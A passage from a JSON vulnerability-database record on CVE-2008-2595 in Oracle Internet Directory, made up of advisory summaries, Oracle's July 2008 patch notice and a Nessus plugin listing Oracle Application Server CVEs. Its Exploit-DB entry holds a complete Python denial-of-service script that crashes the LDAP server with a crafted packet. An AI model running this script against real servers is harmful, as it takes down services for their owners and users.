"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "checkpoint_advisories": [{"lastseen": "2022-06-30T22:58:27", "description": "There exists a denial of service vulnerability in the Oracle Internet Directory. The vulnerability is due to a NULL pointer dereference error when processing LDAP requests. Remote unauthenticated attackers could exploit this vulnerability by sending a crafted LDAP request to create a denial of service condition on the target system.", "cvss3": {}, "published": "2014-04-10T00:00:00", "type": "checkpoint_advisories", "title": "Oracle Internet Directory Pre-Authentication LDAP Denial of Service (CVE-2008-2595)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2008-2595"], "modified": "2014-04-10T00:00:00", "id": "CPAI-2014-1343", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2022-01-13T07:05:45", "description": "", "cvss3": {}, "published": "2008-07-19T00:00:00", "type": "exploitdb", "title": "Oracle Internet Directory 10.1.4 - Remote Denial of Service", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2595", "2008-2595"], "modified": "2008-07-19T00:00:00", "id": "EDB-ID:6101", "href": "https://www.exploit-db.com/exploits/6101", "sourceData": "#!/usr/bin/python\r\n\r\n\"\"\"\r\nOracle Internet Directory 10.1.4 preauthentication Denial Of Service\r\n\r\nNOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours.\r\nSometimes you need 2 shoots to crash OID completely. The server \"commonly\" tolerates one\r\nshoot, but even when you only send one packet it will crash.\r\n\r\nTested: Win2000 x86, WinXP x86, Win2003 X86_64\r\n\r\nVulnerability found by Joxean Koret (joxeankoret [ at ] yahoo DOT es)\r\n\r\nFixed: Oracle Critical Patch Update July 2008\r\nCVEID: CVE-2008-2595\r\n\"\"\"\r\n\r\nimport sys\r\nimport time\r\nimport socket\r\n\r\nhealthPacket = \"0%\\\\x02\\\\x01\\\\x01c \\\\x04\\\\x00\\\\n\\\\x01\\\\x02\\\\n\\\\x01\\\\x00\\\\x02\\\\x01\\\\x00\\\\x02\\\\x01\\\\x00\\\\x01\\\\x01\\\\x00\\\\x87\\\\x0bobjectClass0\\\\x00\"\r\npacket = \"\\x30\\x0e\\x02\\x01\\x01\\x60\\x09\\x30\\x01\\x03\\x04\\x02\\x44\\x4e\\x80\\x00\"\r\n\r\ndef checkHealth(hostname, port):\r\n print \" --> Wating 5 seconds\"\r\n time.sleep(5)\r\n \r\n print \" --> Connecting to target...\"\r\n socket.setdefaulttimeout(5)\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((hostname, port))\r\n\r\n try:\r\n print \" --> Sending 'health' packet ...\"\r\n s.sendall(healthPacket)\r\n print \" --> Trying to receive something...\"\r\n data = s.recv(1024)\r\n except:\r\n err = sys.exc_info()[1]\r\n\r\n if int(err[0]) == 104:\r\n print \"[+] Exploits works!\"\r\n return\r\n\r\n if data != \"\":\r\n print \"[!] Server is up and running :(\"\r\n else:\r\n print \"[?] Server doesn't answer nothing. It works?\"\r\n\r\ndef oidDos(hostname, port):\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n print \"[+] Connecting to ldap://%s:%d...\" % (hostname, port)\r\n s.connect((hostname, int(port)))\r\n\r\n print \"[+] Sending packet...\"\r\n s.sendall(packet)\r\n s.close()\r\n\r\n print \"[+] Checking OID's health...\"\r\n checkHealth(hostname, port)\r\n except:\r\n print sys.exc_info()[1]\r\n\r\ndef usage():\r\n print \"Oracle Internet Directory 10.1.4 Remote Preauthentication DOS\"\r\n print \"Copyright (c) 2007 Joxean Koret\"\r\n print\r\n print \"Usage:\"\r\n print sys.argv[0],\"-h<hostname> -p<port>\"\r\n print\r\n\r\ndef main():\r\n if len(sys.argv) != 3:\r\n usage()\r\n sys.exit(0)\r\n \r\n hostname = None\r\n port = None\r\n\r\n i = 0\r\n for param in sys.argv:\r\n i += 1\r\n \r\n if i == 1:\r\n continue\r\n \r\n if param.startswith(\"-h\"):\r\n hostname = param[2:]\r\n elif param.startswith(\"-p\"):\r\n port = int(param[2:])\r\n else:\r\n print \"Unknown option '%s'\" % param\r\n usage()\r\n sys.exit(1)\r\n \r\n if not hostname or not port:\r\n print \"Bad command line.\"\r\n usage()\r\n sys.exit(1)\r\n\r\n oidDos(hostname, port)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n# milw0rm.com [2008-07-19]", "sourceHref": "https://www.exploit-db.com/download/6101", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "oracle": [{"lastseen": "2021-06-08T18:46:07", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required (because of interdependencies) by those security patches. Critical Patch Updates are cumulative, except as noted below, but each advisory describes only the security fixes added since the previous Critical Patch Update. Thus, prior Critical Patch Update Advisories should be reviewed for information regarding earlier accumulated security fixes. Please refer to\n\nCritical Patch Updates and Security Alerts for information about Oracle Security Advisories.\n\nDue to the threat posed by a successful attack, Oracle strongly recommends that customers apply fixes as soon as possible. This Critical Patch Update contains 45 new security fixes across all products.\n", "cvss3": {}, "published": "2008-07-15T00:00:00", "type": "oracle", "title": "CPUJul2008 Advisory", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2008-2606", "CVE-2008-2579", "CVE-2008-2591", "CVE-2008-2600", "CVE-2008-2612", "CVE-2008-2605", "CVE-2007-1359", "CVE-2008-2603", "CVE-2008-2620", "CVE-2008-2587", "CVE-2008-2583", "CVE-2008-2577", "CVE-2008-2581", "CVE-2008-2582", "CVE-2008-2597", "CVE-2008-2604", "CVE-2008-2589", "CVE-2008-2602", "CVE-2008-2598", "CVE-2008-2576", "CVE-2008-2607", "CVE-2008-2601", "CVE-2008-2617", "CVE-2008-2614", "CVE-2008-2595", "CVE-2008-2578", "CVE-2008-2616", "CVE-2008-2594", "CVE-2008-2608", "CVE-2008-2611", "CVE-2008-2580", "CVE-2008-2590", "CVE-2008-2586", "CVE-2008-2610", "CVE-2008-2613", "CVE-2008-2621", "CVE-2008-2609", "CVE-2008-2622", "CVE-2008-2592", "CVE-2008-2599", "CVE-2008-2593", "CVE-2008-2618", "CVE-2008-2585", "CVE-2008-2596", "CVE-2008-2615"], "modified": "2008-08-04T00:00:00", "id": "ORACLE:CPUJUL2008-090335", "href": "https://www.oracle.com/security-alerts/cpujul2008.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-08-19T12:59:10", "description": "The remote host is running Oracle Application Server. It was not possible to determine its version, so the version of Oracle Application Server installed on the remote host could potentially be affected by multiple vulnerabilities :\n\n - CVE-2000-0169: Remote command execution in the web listener component.\n\n - CVE-2000-1235: Information disclosure in the port listener component and modplsql.\n\n - CVE-2000-1236: SQL injection in mod_sql.\n\n - CVE-2001-0326: Information disclosure in the Java Virtual Machine.\n\n - CVE-2001-0419: Buffer overflow in ndwfn4.so.\n\n - CVE-2001-0591: Directory traversal.\n\n - CVE-2001-1216: Buffer overflow in the PL/SQL Apache module.\n\n - CVE-2001-1217: Directory traversal vulnerability in the PL/SQL Apache module.\n\n - CVE-2001-1371: Improper access control in the SOAP service.\n\n - CVE-2001-1372: Information disclosure.\n\n - CVE-2002-0386: Denial of service through the administration module for Oracle Web Cache.\n\n - CVE-2002-0559: Buffer overflows in the PL/SQL module.\n\n - CVE-2002-0560: Information disclosure in the PL/SQL module.\n\n - CVE-2002-0561: Authentication bypass in the PL/SQL Gateway web administration interface.\n\n - CVE-2002-0562: Information disclosure through globals.jsa.\n\n - CVE-2002-0563: Improper access control on several services.\n\n - CVE-2002-0564: Authentication bypass in the PL/SQL module.\n\n - CVE-2002-0565: Information disclosure through JSP files in the _pages directory.\n\n - CVE-2002-0566: Denial of service in the PL/SQL module.\n\n - CVE-2002-0568: Improper access control on XSQLConfig.xml and soapConfig.xml.\n\n - CVE-2002-0569: Authentication bypass through XSQLServlet.\n\n - CVE-2002-0655: Denial of service in OpenSSL.\n\n - CVE-2002-0656: Buffer overflows in OpenSSL.\n\n - CVE-2002-0659: Denial of service in OpenSSL.\n\n - CVE-2002-0840: Cross-site scripting in the default error page of Apache.\n\n - CVE-2002-0842: Format string vulnerability in mod_dav.\n\n - CVE-2002-0843: Buffer overflows in ApacheBench.\n\n - CVE-2002-0947: Buffer overflow in rwcgi60.\n\n - CVE-2002-1089: Information disclosure in rwcgi60.\n\n - CVE-2002-1630: Improper access control on sendmail.jsp.\n\n - CVE-2002-1631: SQL injection in query.xsql.\n\n - CVE-2002-1632: Information disclosure through several JSP pages.\n\n - CVE-2002-1635: Information disclosure in Apache.\n\n - CVE-2002-1636: Cross-site scripting in the htp PL/SQL package.\n\n - CVE-2002-1637: Default credentials in multiple components.\n\n - CVE-2002-1858: Information disclosure through the WEB-INF directory.\n\n - CVE-2002-2153: Format string vulnerability in the administrative pages of the PL/SQL module.\n\n - CVE-2002-2345: Credential leakage in the web cache administrator interface.\n\n - CVE-2002-2347: Cross-site scripting in several JSP pages.\n\n - CVE-2004-1362: Authentication bypass in the PL/SQL module.\n\n - CVE-2004-1363: Buffer overflow in extproc.\n\n - CVE-2004-1364: Directory traversal in extproc.\n\n - CVE-2004-1365: Command execution in extproc.\n\n - CVE-2004-1366: Improper access control on emoms.properties.\n\n - CVE-2004-1367: Credential leakage in Database Server.\n\n - CVE-2004-1368: Arbitrary file execution in ISQL*Plus.\n\n - CVE-2004-1369: Denial of service in TNS Listener.\n\n - CVE-2004-1370: Multiple SQL injection vulnerabilities in PL/SQL.\n\n - CVE-2004-1371: Stack-based buffer overflow.\n\n - CVE-2004-1707: Privilege escalation in dbsnmp and nmo.\n\n - CVE-2004-1774: Buffer overflow in the MD2 package.\n\n - CVE-2004-1877: Phishing vulnerability in Single Sign-On component.\n\n - CVE-2004-2134: Weak cryptography for passwords in the toplink mapping workBench.\n\n - CVE-2004-2244: Denial of service in the XML parser.\n\n - CVE-2005-1383: Authentication bypass in HTTP Server.\n\n - CVE-2005-1495: Detection bypass.\n\n - CVE-2005-1496: Privilege escalation in the DBMS_Scheduler.\n\n - CVE-2005-2093: Web cache poisoning.\n\n - CVE-2005-3204: Cross-site scripting.\n\n - CVE-2005-3445: Multiple unspecified vulnerabilities in HTTP Server.\n\n - CVE-2005-3446: Unspecified vulnerability in Internet Directory.\n\n - CVE-2005-3447: Unspecified vulnerability in Single Sign-On.\n\n - CVE-2005-3448: Unspecified vulnerability in the OC4J module.\n\n - CVE-2005-3449: Multiple unspecified vulnerabilities in multiple components.\n\n - CVE-2005-3450: Unspecified vulnerability in HTTP Server.\n\n - CVE-2005-3451: Unspecified vulnerability in SQL*ReportWriter.\n\n - CVE-2005-3452: Unspecified vulnerability in Web Cache.\n\n - CVE-2005-3453: Multiple unspecified vulnerabilities in Web Cache.\n\n - CVE-2006-0273: Unspecified vulnerability in the Portal component.\n\n - CVE-2006-0274: Unspecified vulnerability in the Oracle Reports Developer component.\n\n - CVE-2006-0275: Unspecified vulnerability in the Oracle Reports Developer component.\n\n - CVE-2006-0282: Unspecified vulnerability.\n\n - CVE-2006-0283: Unspecified vulnerability.\n\n - CVE-2006-0284: Multiple unspecified vulnerabilities.\n\n - CVE-2006-0285: Unspecified vulnerability in the Java Net component.\n\n - CVE-2006-0286: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-0287: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-0288: Multiple unspecified vulnerabilities in the Oracle Reports Developer component.\n\n - CVE-2006-0289: Multiple unspecified vulnerabilities.\n\n - CVE-2006-0290: Unspecified vulnerability in the Oracle Workflow Cartridge component.\n\n - CVE-2006-0291: Multiple unspecified vulnerabilities in the Oracle Workflow Cartridge component.\n\n - CVE-2006-0435: Unspecified vulnerability in Oracle PL/SQL.\n\n - CVE-2006-0552: Unspecified vulnerability in the Net Listener component.\n\n - CVE-2006-0586: Multiple SQL injection vulnerabilities.\n\n - CVE-2006-1884: Unspecified vulnerability in the Oracle Thesaurus Management System component.\n\n - CVE-2006-3706: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-3707: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-3708: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-3709: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-3710: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-3711: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-3712: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-3713: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-3714: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-5353: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5354: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5355: Unspecified vulnerability in Single Sign-On.\n\n - CVE-2006-5356: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-5357: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5358: Unspecified vulnerability in the Oracle Forms component.\n\n - CVE-2006-5359: Multiple unspecified vulnerabilities in Oracle Reports Developer component.\n\n - CVE-2006-5360: Unspecified vulnerability in Oracle Forms component.\n\n - CVE-2006-5361: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-5362: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-5363: Unspecified vulnerability in Single Sign-On.\n\n - CVE-2006-5364: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-5365: Unspecified vulnerability in Oracle Forms.\n\n - CVE-2006-5366: Multiple unspecified vulnerabilities.\n\n - CVE-2007-0222: Directory traversal vulnerability in EmChartBean.\n\n - CVE-2007-0275: Cross-site scripting vulnerability in Oracle Reports Web Cartridge (RWCGI60).\n\n - CVE-2007-0280: Buffer overflow in Oracle Notification Service.\n\n - CVE-2007-0281: Multiple unspecified vulnerabilities in HTTP Server.\n\n - CVE-2007-0282: Unspecified vulnerability in OPMN02.\n\n - CVE-2007-0283: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2007-0284: Multiple unspecified vulnerabilities in Oracle Containers for J2EE.\n\n - CVE-2007-0285: Unspecified vulnerability in Oracle Reports Developer.\n\n - CVE-2007-0286: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2007-0287: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2007-0288: Unspecified vulnerability in Oracle Internet Directory.\n\n - CVE-2007-0289: Multiple unspecified vulnerabilities in Oracle Containers for J2EE.\n\n - CVE-2007-1359: Improper access control in mod_security.\n\n - CVE-2007-1609: Cross-site scripting vulnerability in servlet/Spy in Dynamic Monitoring Services (DMS).\n\n - CVE-2007-2119: Cross-site scripting vulnerability in the Administration Front End for Oracle Enterprise (Ultra) Search.\n\n - CVE-2007-2120: Denial of service in the Oracle Discoverer servlet.\n\n - CVE-2007-2121: Unspecified vulnerability in the COREid Access component.\n\n - CVE-2007-2122: Unspecified vulnerability in the Wireless component.\n\n - CVE-2007-2123: Unspecified vulnerability in the Portal component.\n\n - CVE-2007-2124: Unspecified vulnerability in the Portal component.\n\n - CVE-2007-2130: Unspecified vulnerability in Workflow Cartridge.\n\n - CVE-2007-3553: Cross-site scripting vulnerability in Rapid Install Web Server.\n\n - CVE-2007-3854: Multiple unspecified vulnerabilities in the Advanced Queuing component and the Spatial component.\n\n - CVE-2007-3859: Unspecified vulnerability in the Oracle Internet Directory component.\n\n - CVE-2007-3861: Unspecified vulnerability in Oracle Jdeveloper.\n\n - CVE-2007-3862: Unspecified vulnerability in Single Sign-On.\n\n - CVE-2007-3863: Unspecified vulnerability in Oracle JDeveloper.\n\n - CVE-2007-5516: Unspecified vulnerability in the Oracle Process Mgmt & Notification component.\n\n - CVE-2007-5517: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2007-5518: Unspecified vulnerability in HTTP Server.\n\n - CVE-2007-5519: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2007-5520: Unspecified vulnerability in the Oracle Internet Directory component.\n\n - CVE-2007-5521: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2007-5522: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2007-5523: Unspecified vulnerability in the Oracle Internet Directory component.\n\n - CVE-2007-5524: Unspecified vulnerability in Single Sign-On.\n\n - CVE-2007-5525: Unspecified vulnerability in Single Sign-On.\n\n - CVE-2007-5526: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2007-5531: Unspecified vulnerability in Oracle Help for Web.\n\n - CVE-2008-0340: Multiple unspecified vulnerabilities in the Advanced Queuing component and Spatial component.\n\n - CVE-2008-0343: Unspecified vulnerability in the Oracle Spatial component.\n\n - CVE-2008-0344: Unspecified vulnerability in the Oracle Spatial component.\n\n - CVE-2008-0345: Unspecified vulnerability in the Core RDBMS component.\n\n - CVE-2008-0346: Unspecified vulnerability in the Oracle Jinitiator component.\n\n - CVE-2008-0347: Unspecified vulnerability in the Oracle Ultra Search component.\n\n - CVE-2008-0348: Multiple unspecified vulnerabilities in the PeopleTools component.\n\n - CVE-2008-0349: Unspecified vulnerability in the PeopleTools component.\n\n - CVE-2008-1812: Unspecified vulnerability in the Oracle Enterprise Manager component.\n\n - CVE-2008-1814: Unspecified vulnerability in the Oracle Secure Enterprise Search or Ultrasearch component.\n\n - CVE-2008-1823: Unspecified vulnerability in the Oracle Jinitiator component.\n\n - CVE-2008-1824: Unspecified vulnerability in the Oracle Dynamic Monitoring Service component.\n\n - CVE-2008-1825: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2008-2583: Unspecified vulnerability in the sample Discussion Forum Portlet for the Oracle Portal component.\n\n - CVE-2008-2588: Unspecified vulnerability in the Oracle JDeveloper component.\n\n - CVE-2008-2589: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2008-2593: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2008-2594: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2008-2595: Unspecified vulnerability in the Oracle Internet Directory component.\n\n - CVE-2008-2609: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2008-2612: Unspecified vulnerability in the Hyperion BI Plus component.\n\n - CVE-2008-2614: Unspecified vulnerability in HTTP Server.\n\n - CVE-2008-2619: Unspecified vulnerability in the Oracle Reports Developer component.\n\n - CVE-2008-2623: Unspecified vulnerability in the Oracle JDeveloper component.\n\n - CVE-2008-3975: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2008-3977: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2008-3986: Unspecified vulnerability in the Oracle Discoverer Administrator component.\n\n - CVE-2008-3987: Unspecified vulnerability in the Oracle Discoverer Desktop component.\n\n - CVE-2008-4014: Unspecified vulnerability in the Oracle BPEL Process Manager component.\n\n - CVE-2008-4017: Unspecified vulnerability in the OC4J component.\n\n - CVE-2008-5438: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2008-7233: Unspecified vulnerability in the Oracle Jinitiator component.\n\n - CVE-2009-0217: Signature spoofing vulnerability in multiple components.\n\n - CVE-2009-0989: Unspecified vulnerability in the BI Publisher component.\n\n - CVE-2009-0990: Unspecified vulnerability in the BI Publisher component.\n\n - CVE-2009-0994: Unspecified vulnerability in the BI Publisher component.\n\n - CVE-2009-1008: Unspecified vulnerability in the Outside In Technology component.\n\n - CVE-2009-1009: Unspecified vulnerability in the Outside In Technology component.\n\n - CVE-2009-1010: Unspecified vulnerability in the Outside In Technology component.\n\n - CVE-2009-1011: Unspecified vulnerability in the Outside In Technology component.\n\n - CVE-2009-1017: Unspecified vulnerability in the BI Publisher component.\n\n - CVE-2009-1976: Unspecified vulnerability in HTTP Server.\n\n - CVE-2009-1990: Unspecified vulnerability in the Business Intelligence Enterprise Edition component.\n\n - CVE-2009-1999: Unspecified vulnerability in the Business Intelligence Enterprise Edition component.\n\n - CVE-2009-3407: Unspecified vulnerability in the Portal component.\n\n - CVE-2009-3412: Unspecified vulnerability in the Unzip component.\n\n - CVE-2010-0066: Unspecified vulnerability in the Access Manager Identity Server component.\n\n - CVE-2010-0067: Unspecified vulnerability in the Oracle Containers for J2EE component.\n\n - CVE-2010-0070: Unspecified vulnerability in the Oracle Containers for J2EE component.\n\n - CVE-2011-0789: Unspecified vulnerability in HTTP Server.\n\n - CVE-2011-0795: Unspecified vulnerability in Single Sign-On.\n\n - CVE-2011-0884: Unspecified vulnerability in the Oracle BPEL Process Manager component.\n\n - CVE-2011-2237: Unspecified vulnerability in the Oracle Web Services Manager component.\n\n - CVE-2011-2314: Unspecified vulnerability in the Oracle Containers for J2EE component.\n\n - CVE-2011-3523: Unspecified vulnerability in the Oracle Web Services Manager component.", "cvss3": {"score": null, "vector": null}, "published": "2012-01-24T00:00:00", "type": "nessus", "title": "Oracle Application Server Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2000-0169", "CVE-2000-1235", "CVE-2000-1236", "CVE-2001-0326", "CVE-2001-0419", "CVE-2001-0591", "CVE-2001-1216", "CVE-2001-1217", "CVE-2001-1371", "CVE-2001-1372", "CVE-2002-0386", "CVE-2002-0559", "CVE-2002-0560", "CVE-2002-0561", "CVE-2002-0562", "CVE-2002-0563", "CVE-2002-0564", "CVE-2002-0565", "CVE-2002-0566", "CVE-2002-0568", "CVE-2002-0569", "CVE-2002-0655", "CVE-2002-0656", "CVE-2002-0659", "CVE-2002-0840", "CVE-2002-0842", "CVE-2002-0843", "CVE-2002-0947", "CVE-2002-1089", "CVE-2002-1630", "CVE-2002-1631", "CVE-2002-1632", "CVE-2002-1635", "CVE-2002-1636", "CVE-2002-1637", "CVE-2002-1858", "CVE-2002-2153", "CVE-2002-2345", "CVE-2002-2347", "CVE-2004-1362", "CVE-2004-1363", "CVE-2004-1364", "CVE-2004-1365", "CVE-2004-1366", "CVE-2004-1367", "CVE-2004-1368", "CVE-2004-1369", "CVE-2004-1370", "CVE-2004-1371", "CVE-2004-1707", "CVE-2004-1774", "CVE-2004-1877", "CVE-2004-2134", "CVE-2004-2244", "CVE-2005-1383", "CVE-2005-1495", "CVE-2005-1496", "CVE-2005-2093", "CVE-2005-3204", "CVE-2005-3445", "CVE-2005-3446", "CVE-2005-3447", "CVE-2005-3448", "CVE-2005-3449", "CVE-2005-3450", "CVE-2005-3451", "CVE-2005-3452", "CVE-2005-3453", "CVE-2006-0273", "CVE-2006-0274", "CVE-2006-0275", "CVE-2006-0282", "CVE-2006-0283", "CVE-2006-0284", "CVE-2006-0285", "CVE-2006-0286", "CVE-2006-0287", "CVE-2006-0288", "CVE-2006-0289", "CVE-2006-0290", "CVE-2006-0291", "CVE-2006-0435", "CVE-2006-0552", "CVE-2006-0586", "CVE-2006-1884", "CVE-2006-3706", "CVE-2006-3707", "CVE-2006-3708", "CVE-2006-3709", "CVE-2006-3710", "CVE-2006-3711", "CVE-2006-3712", "CVE-2006-3713", "CVE-2006-3714", "CVE-2006-5353", "CVE-2006-5354", "CVE-2006-5355", "CVE-2006-5356", "CVE-2006-5357", "CVE-2006-5358", "CVE-2006-5359", "CVE-2006-5360", "CVE-2006-5361", "CVE-2006-5362", "CVE-2006-5363", "CVE-2006-5364", "CVE-2006-5365", "CVE-2006-5366", "CVE-2007-0222", "CVE-2007-0275", "CVE-2007-0280", "CVE-2007-0281", "CVE-2007-0282", "CVE-2007-0283", "CVE-2007-0284", "CVE-2007-0285", "CVE-2007-0286", "CVE-2007-0287", "CVE-2007-0288", "CVE-2007-0289", "CVE-2007-1359", "CVE-2007-1609", "CVE-2007-2119", "CVE-2007-2120", "CVE-2007-2121", "CVE-2007-2122", "CVE-2007-2123", "CVE-2007-2124", "CVE-2007-2130", "CVE-2007-3553", "CVE-2007-3854", "CVE-2007-3859", "CVE-2007-3861", "CVE-2007-3862", "CVE-2007-3863", "CVE-2007-5516", "CVE-2007-5517", "CVE-2007-5518", "CVE-2007-5519", "CVE-2007-5520", "CVE-2007-5521", "CVE-2007-5522", "CVE-2007-5523", "CVE-2007-5524", "CVE-2007-5525", "CVE-2007-5526", "CVE-2007-5531", "CVE-2008-0340", "CVE-2008-0343", "CVE-2008-0344", "CVE-2008-0345", "CVE-2008-0346", "CVE-2008-0347", "CVE-2008-0348", "CVE-2008-0349", "CVE-2008-1812", "CVE-2008-1814", "CVE-2008-1823", "CVE-2008-1824", "CVE-2008-1825", "CVE-2008-2583", "CVE-2008-2588", "CVE-2008-2589", "CVE-2008-2593", "CVE-2008-2594", "CVE-2008-2595", "CVE-2008-2609", "CVE-2008-2612", "CVE-2008-2614", "CVE-2008-2619", "CVE-2008-2623", "CVE-2008-3975", "CVE-2008-3977", "CVE-2008-3986", "CVE-2008-3987", "CVE-2008-4014", "CVE-2008-4017", "CVE-2008-5438", "CVE-2008-7233", "CVE-2009-0217", "CVE-2009-0989", "CVE-2009-0990", "CVE-2009-0994", "CVE-2009-1008", "CVE-2009-1009", "CVE-2009-1010", "CVE-2009-1011", "CVE-2009-1017", "CVE-2009-1976", "CVE-2009-1990", "CVE-2009-1999", "CVE-2009-3407", "CVE-2009-3412", "CVE-2010-0066", "CVE-2010-0067", "CVE-2010-0070", "CVE-2011-0789", "CVE-2011-0795", "CVE-2011-0884", "CVE-2011-2237", "CVE-2011-2314", "CVE-2011-3523"], "modified": "2019-04-05T00:00:00", "cpe": ["cpe:/a:oracle:application_server"], "id": "ORACLE_APPLICATION_SERVER_PCI.NASL", "href": "https://www.tenable.com/plugins/nessus/57619", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57619);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2019/04/05 15:04:42\");\n\n script_cve_id(\n \"CVE-2000-0169\",\n \"CVE-2000-1235\",\n \"CVE-2000-1236\",\n \"CVE-2001-0326\",\n \"CVE-2001-0419\",\n \"CVE-2001-0591\",\n \"CVE-2001-1216\",\n \"CVE-2001-1217\",\n \"CVE-2001-1371\",\n \"CVE-2001-1372\",\n \"CVE-2002-0386\",\n \"CVE-2002-0559\",\n \"CVE-2002-0560\",\n \"CVE-2002-0561\",\n \"CVE-2002-0562\",\n \"CVE-2002-0563\",\n \"CVE-2002-0564\",\n \"CVE-2002-0565\",\n \"CVE-2002-0566\",\n \"CVE-2002-0568\",\n \"CVE-2002-0569\",\n \"CVE-2002-0655\",\n \"CVE-2002-0656\",\n \"CVE-2002-0659\",\n \"CVE-2002-0840\",\n \"CVE-2002-0842\",\n \"CVE-2002-0843\",\n \"CVE-2002-0947\",\n \"CVE-2002-1089\",\n \"CVE-2002-1630\",\n \"CVE-2002-1631\",\n \"CVE-2002-1632\",\n \"CVE-2002-1635\",\n \"CVE-2002-1636\",\n \"CVE-2002-1637\",\n \"CVE-2002-1858\",\n \"CVE-2002-2153\",\n \"CVE-2002-2345\",\n \"CVE-2002-2347\",\n \"CVE-2004-1362\",\n \"CVE-2004-1363\",\n \"CVE-2004-1364\",\n \"CVE-2004-1365\",\n \"CVE-2004-1366\",\n \"CVE-2004-1367\",\n \"CVE-2004-1368\",\n \"CVE-2004-1369\",\n \"CVE-2004-1370\",\n \"CVE-2004-1371\",\n \"CVE-2004-1707\",\n \"CVE-2004-1774\",\n \"CVE-2004-1877\",\n \"CVE-2004-2134\",\n \"CVE-2004-2244\",\n \"CVE-2005-1383\",\n \"CVE-2005-1495\",\n \"CVE-2005-1496\",\n \"CVE-2005-2093\",\n \"CVE-2005-3204\",\n \"CVE-2005-3445\",\n \"CVE-2005-3446\",\n \"CVE-2005-3447\",\n \"CVE-2005-3448\",\n \"CVE-2005-3449\",\n \"CVE-2005-3450\",\n \"CVE-2005-3451\",\n \"CVE-2005-3452\",\n \"CVE-2005-3453\",\n \"CVE-2006-0273\",\n \"CVE-2006-0274\",\n \"CVE-2006-0275\",\n \"CVE-2006-0282\",\n \"CVE-2006-0283\",\n \"CVE-2006-0284\",\n \"CVE-2006-0285\",\n \"CVE-2006-0286\",\n \"CVE-2006-0287\",\n \"CVE-2006-0288\",\n \"CVE-2006-0289\",\n \"CVE-2006-0290\",\n \"CVE-2006-0291\",\n \"CVE-2006-0435\",\n \"CVE-2006-0552\",\n \"CVE-2006-0586\",\n \"CVE-2006-1884\",\n \"CVE-2006-3706\",\n \"CVE-2006-3707\",\n \"CVE-2006-3708\",\n \"CVE-2006-3709\",\n \"CVE-2006-3710\",\n \"CVE-2006-3711\",\n \"CVE-2006-3712\",\n \"CVE-2006-3713\",\n \"CVE-2006-3714\",\n \"CVE-2006-5353\",\n \"CVE-2006-5354\",\n \"CVE-2006-5355\",\n \"CVE-2006-5356\",\n \"CVE-2006-5357\",\n \"CVE-2006-5358\",\n \"CVE-2006-5359\",\n \"CVE-2006-5360\",\n \"CVE-2006-5361\",\n \"CVE-2006-5362\",\n \"CVE-2006-5363\",\n \"CVE-2006-5364\",\n \"CVE-2006-5365\",\n \"CVE-2006-5366\",\n \"CVE-2007-0222\",\n \"CVE-2007-0275\",\n \"CVE-2007-0280\",\n \"CVE-2007-0281\",\n \"CVE-2007-0282\",\n 